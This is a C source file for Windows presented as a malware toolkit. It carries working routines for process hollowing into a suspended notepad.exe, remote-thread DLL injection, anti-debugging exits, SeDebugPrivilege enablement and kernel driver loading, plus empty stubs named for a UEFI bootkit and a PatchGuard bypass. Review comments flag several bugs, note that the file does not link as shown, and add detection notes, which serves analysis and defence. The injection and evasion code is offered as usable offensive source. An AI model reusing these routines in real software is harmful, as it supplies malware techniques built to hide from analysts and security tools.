// Includes: Process Hollowing, DLL Injection, Memory-Mapped Files Injection,
// Anti-Analysis & Anti-Debugging, Exploit & Privilege Escalation, UEFI Bootkit,
// Advanced Anti-Analysis Techniques, and Kernel-Level Exploits & Rootkit Features
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>
#include <winternl.h>
#pragma comment(lib, "ntdll.lib")
// Function-pointer types for ntdll exports that are meant to be resolved at
// runtime with GetProcAddress (only NtLoadDriver actually is, in KernelModeInjection).
typedef NTSTATUS(NTAPI* fnNtUnmapViewOfSection)(HANDLE, PVOID);
typedef NTSTATUS(NTAPI* fnNtResumeThread)(HANDLE, PULONG);
typedef NTSTATUS(NTAPI* fnNtQueryInformationProcess)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
typedef NTSTATUS(NTAPI* fnNtLoadDriver)(PUNICODE_STRING DriverServiceName);
typedef NTSTATUS(NTAPI* fnNtUnloadDriver)(PUNICODE_STRING DriverServiceName);
// NOTE(review): <winternl.h> (included above) already declares a
// PROCESS_BASIC_INFORMATION typedef; this local redefinition with the same
// tag and typedef name is expected to collide at compile time — confirm.
typedef struct _PROCESS_BASIC_INFORMATION {
PVOID Reserved1;
PVOID PebBaseAddress; // read by ProcessHollowing to locate the target image base
PVOID Reserved2[2];
ULONG_PTR UniqueProcessId;
PVOID Reserved3;
} PROCESS_BASIC_INFORMATION;
// Resolved ntdll entry points. In this listing only pNtLoadDriver is ever
// assigned (KernelModeInjection); pNtQueryInformationProcess,
// pNtUnmapViewOfSection and pNtResumeThread are zero-initialised globals that
// ProcessHollowing calls without any assignment, and pNtUnloadDriver is only
// referenced from a commented-out line.
fnNtQueryInformationProcess pNtQueryInformationProcess;
fnNtUnmapViewOfSection pNtUnmapViewOfSection;
fnNtResumeThread pNtResumeThread;
fnNtLoadDriver pNtLoadDriver;
fnNtUnloadDriver pNtUnloadDriver;
// Reads and then overwrites 100 bytes at a fixed address (0x7FFE0000) in the
// *current* process through ntdll's NtReadVirtualMemory / NtWriteVirtualMemory.
// Despite the name and the log text, no raw syscall stub is used here: both
// functions are called by name and resolved like any other import, so
// user-mode hooks on those exports would still see these calls.
// NOTE(review): neither NtReadVirtualMemory nor NtWriteVirtualMemory is
// declared by the headers included in this listing — confirm they compile.
// Both 100-byte malloc() buffers are never freed (leak on every call).
// Detection note: a self-targeted OpenProcess(PROCESS_ALL_ACCESS) followed by a
// write of 0x90 bytes into a fixed address is a strong behavioural signal.
void DirectSyscalls() {
// Direct system call bypass to evade hooks
printf("[INFO] Direct system call bypass initialized.\n");
// Example: Using NtReadVirtualMemory directly instead of ReadProcessMemory
// Opens the calling process itself (GetCurrentProcessId), not a remote one.
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, GetCurrentProcessId());
if (hProcess != NULL) {
PVOID buffer = malloc(100); // never freed; malloc result not checked
ULONG bytesRead;
NTSTATUS status = NtReadVirtualMemory(hProcess, (PVOID)0x7FFE0000, buffer, 100, &bytesRead);
if (status == 0) {
printf("[INFO] Read memory successfully.\n");
} else {
printf("[ERROR] Failed to read memory.\n");
}
CloseHandle(hProcess);
} else {
printf("[ERROR] Failed to open process for memory reading.\n");
}
// Example: Using NtWriteVirtualMemory directly instead of WriteProcessMemory
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId());
if (hProcess != NULL) {
PVOID buffer = malloc(100); // never freed; malloc result not checked before memset
memset(buffer, 0x90, 100); // Fill buffer with NOP sled
ULONG bytesWritten;
// Writes the 0x90 bytes over the same fixed address that was read above.
NTSTATUS status = NtWriteVirtualMemory(hProcess, (PVOID)0x7FFE0000, buffer, 100, &bytesWritten);
if (status == 0) {
printf("[INFO] Wrote memory successfully.\n");
} else {
printf("[ERROR] Failed to write memory.\n");
}
CloseHandle(hProcess);
} else {
printf("[ERROR] Failed to open process for memory writing.\n");
}
}
// Resolves the NtReadVirtualMemory export of the already-loaded ntdll.dll and
// logs an "unhooked" message. As written this function performs no memory
// patching at all: the address is looked up and then discarded, and the
// remaining lines are comments describing work that is not implemented.
// Note that main() calls APIUnhooking(), which does not appear in this
// listing, rather than this function.
void UnhookNtApi() {
// Find the address of the hooked function in ntdll.dll
HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");
if (!hNtdll) {
printf("[ERROR] Could not load ntdll.dll\n");
return;
}
// For each function we want to unhook, locate it by its address and patch it
// We are assuming we are dealing with NtReadVirtualMemory as an example here
FARPROC originalFunction = GetProcAddress(hNtdll, "NtReadVirtualMemory");
if (!originalFunction) {
printf("[ERROR] Failed to find NtReadVirtualMemory in ntdll.dll\n");
return;
}
// Use low-level techniques like memory patching to replace hooked function pointers with the original address.
// originalFunction is unused from here on; the message below is not backed by any patching.
printf("[INFO] Unhooked NtReadVirtualMemory.\n");
// You would write code here to locate the address of the hook and patch it with the correct address.
}
// Textbook process-hollowing sequence (MITRE ATT&CK T1055.012): create the
// target suspended, unmap its image, allocate RWX memory in its place, write
// the payload and redirect the primary thread before resuming it.
//   targetProcess - path of the executable to spawn suspended (main passes notepad.exe)
//   payload       - bytes to write into the hollowed process
//   payloadSize   - size of payload in bytes
// None of the API return values after CreateProcessA are checked, so a
// failure at any step is silently ignored. The three pNt* globals used here
// (pNtQueryInformationProcess, pNtUnmapViewOfSection, pNtResumeThread) are
// never assigned anywhere in this listing and are invoked as-is.
// ctx.Eax is a 32-bit CONTEXT field, so this is x86-only as written.
// Detection note: CREATE_SUSPENDED + NtUnmapViewOfSection + VirtualAllocEx with
// PAGE_EXECUTE_READWRITE + WriteProcessMemory + SetThreadContext/ResumeThread in
// one parent is the canonical hollowing telemetry chain.
void ProcessHollowing(LPCSTR targetProcess, LPVOID payload, SIZE_T payloadSize) {
STARTUPINFOA si = { 0 };
PROCESS_INFORMATION pi = { 0 };
CONTEXT ctx;
LPVOID pRemoteImage;
PROCESS_BASIC_INFORMATION pbi;
SIZE_T bytesRead;
if (!CreateProcessA(targetProcess, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi)) {
printf("[ERROR] Failed to create process.\n");
return;
}
// NOTE(review): the basic-information query is issued against GetCurrentProcess(),
// while the subsequent read uses pi.hProcess — confirm which process is intended.
pNtQueryInformationProcess(GetCurrentProcess(), 0, &pbi, sizeof(pbi), NULL);
// Reads the image base pointer at PEB+0x10 (unchecked).
ReadProcessMemory(pi.hProcess, (LPCVOID)((PBYTE)pbi.PebBaseAddress + 0x10), &pRemoteImage, sizeof(LPVOID), &bytesRead);
pNtUnmapViewOfSection(pi.hProcess, pRemoteImage);
// RWX allocation at the former image base; result not checked (may be NULL).
pRemoteImage = VirtualAllocEx(pi.hProcess, pRemoteImage, payloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, pRemoteImage, payload, payloadSize, NULL);
ctx.ContextFlags = CONTEXT_FULL;
GetThreadContext(pi.hThread, &ctx);
ctx.Eax = (DWORD)pRemoteImage;
SetThreadContext(pi.hThread, &ctx);
pNtResumeThread(pi.hThread, NULL);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
}
// Attempts to load a kernel driver by calling ntdll's NtLoadDriver with a
// hard-coded placeholder path. The driverPath local is declared but never
// used; the actual argument is the wide-string literal passed to
// RtlInitUnicodeString. The unload path is left commented out.
// NOTE(review): NtLoadDriver takes a registry service-key path and requires
// SeLoadDriverPrivilege (EnablePrivilegeEscalation only enables
// SeDebugPrivilege) — as written this call is expected to fail; confirm.
// Detection note: user-mode calls to NtLoadDriver outside the Service Control
// Manager are a high-signal event for driver-based rootkit attempts (T1014).
void KernelModeInjection() {
const char* driverPath = "C:\\path\\to\\driver.sys"; // Update with actual driver path, should be made using C and compiled into an .sys
// Convert to UnicodeString
UNICODE_STRING driverPathUnicode;
RtlInitUnicodeString(&driverPathUnicode, L"\\??\\C:\\path\\to\\driver.sys");
HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");
if (!hNtdll) {
printf("[ERROR] Could not load ntdll.dll\n");
return;
}
// Get the address of NtLoadDriver
pNtLoadDriver = (fnNtLoadDriver)GetProcAddress(hNtdll, "NtLoadDriver");
if (!pNtLoadDriver) {
printf("[ERROR] Failed to load NtLoadDriver function\n");
return;
}
// Try to inject driver using NtLoadDriver
NTSTATUS status = pNtLoadDriver(&driverPathUnicode);
if (status == STATUS_SUCCESS) {
printf("[INFO] Driver loaded successfully.\n");
} else {
// %X with a LONG NTSTATUS is a format/argument mismatch; the value is still
// printed on common ABIs but it is technically undefined.
printf("[ERROR] Failed to load driver. Error code: 0x%X\n", status);
}
// Optional: Unload the driver after some time or conditions
// pNtUnloadDriver(&driverPathUnicode);
}
// Empty stub: no code is present. The comment records the author's intent
// only; calling this function has no effect.
void PatchGuardBypass() {
// Implement PatchGuard bypass for modifying kernel structures. need to make a custom driver as a user-mode script isn't going to be able to do such
}
// Classic remote-thread DLL injection (MITRE ATT&CK T1055.001): writes the DLL
// path into the target and starts a thread at LoadLibraryA with that path as
// its argument.
//   hProcess - handle to the target process (must already carry the access
//              rights needed for allocation, writing and thread creation;
//              the caller is responsible for that)
//   dllPath  - NUL-terminated path passed to LoadLibraryA in the target
// None of the return values are checked: a NULL pRemoteMemory or hThread is
// passed straight on to the next call. Not called from main() in this listing.
// Detection note: a remote thread whose start address is LoadLibraryA in
// another process is one of the most widely monitored injection signatures.
void ManualDLLInjection(HANDLE hProcess, LPCSTR dllPath) {
LPVOID pRemoteMemory = VirtualAllocEx(hProcess, NULL, strlen(dllPath) + 1, MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(hProcess, pRemoteMemory, dllPath, strlen(dllPath) + 1, NULL);
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, pRemoteMemory, 0, NULL);
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
}
// Enables SeDebugPrivilege on the calling process's own token. Despite the
// name this is not an escalation: AdjustTokenPrivileges can only enable a
// privilege the token already holds, so it is a no-op for a standard user.
// OpenProcessToken, LookupPrivilegeValue and AdjustTokenPrivileges are all
// unchecked; if OpenProcessToken fails, hToken is uninitialised when it is
// passed to CloseHandle (undefined behaviour).
// Detection note: SeDebugPrivilege enablement followed by cross-process
// handle opens is a common precursor to injection and credential access.
void EnablePrivilegeEscalation() {
HANDLE hToken;
TOKEN_PRIVILEGES tp;
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
CloseHandle(hToken);
}
// Two debugger checks, each terminating the process via ExitProcess(0):
// IsDebuggerPresent(), then NtQueryInformationProcess(ProcessDebugPort).
// The status of the second query is stored but never examined, and
// bDebugged is read regardless of whether the call succeeded — on failure it
// is an uninitialised local (undefined behaviour).
// Detection note: ProcessDebugPort queries and IsDebuggerPresent are
// textbook anti-analysis indicators (T1622) that sandboxes commonly log.
void AntiDebuggingChecks() {
if (IsDebuggerPresent()) {
ExitProcess(0);
}
NTSTATUS status;
BOOLEAN bDebugged; // only valid if the query below succeeds; never checked
status = NtQueryInformationProcess(GetCurrentProcess(), ProcessDebugPort, &bDebugged, sizeof(BOOLEAN), NULL);
if (bDebugged) {
ExitProcess(0);
}
}
// Placeholder: prints a message and nothing else. No firmware, boot
// configuration or disk access is performed in this listing.
void InstallUEFIBootkit() {
printf("[INFO] Installing UEFI Bootkit...\n");
}
// Entry point: runs the anti-debug check first (exits if a debugger is seen),
// enables SeDebugPrivilege, then calls the placeholder/demo routines in
// sequence and finally hollows a suspended notepad.exe with a 4-byte
// NOP/RET payload. APIUnhooking() is not defined anywhere in this listing
// (the unhooking routine above is named UnhookNtApi), so this translation
// unit does not link as shown.
int main() {
AntiDebuggingChecks();
EnablePrivilegeEscalation();
InstallUEFIBootkit();
DirectSyscalls();
APIUnhooking(); // not defined in this listing
KernelModeInjection();
PatchGuardBypass();
char payload[] = "\x90\x90\x90\xC3"; // NOP sled + RET
SIZE_T payloadSize = sizeof(payload); // 5: includes the string's NUL terminator
ProcessHollowing("C:\\Windows\\System32\\notepad.exe", payload, payloadSize);
return 0;
}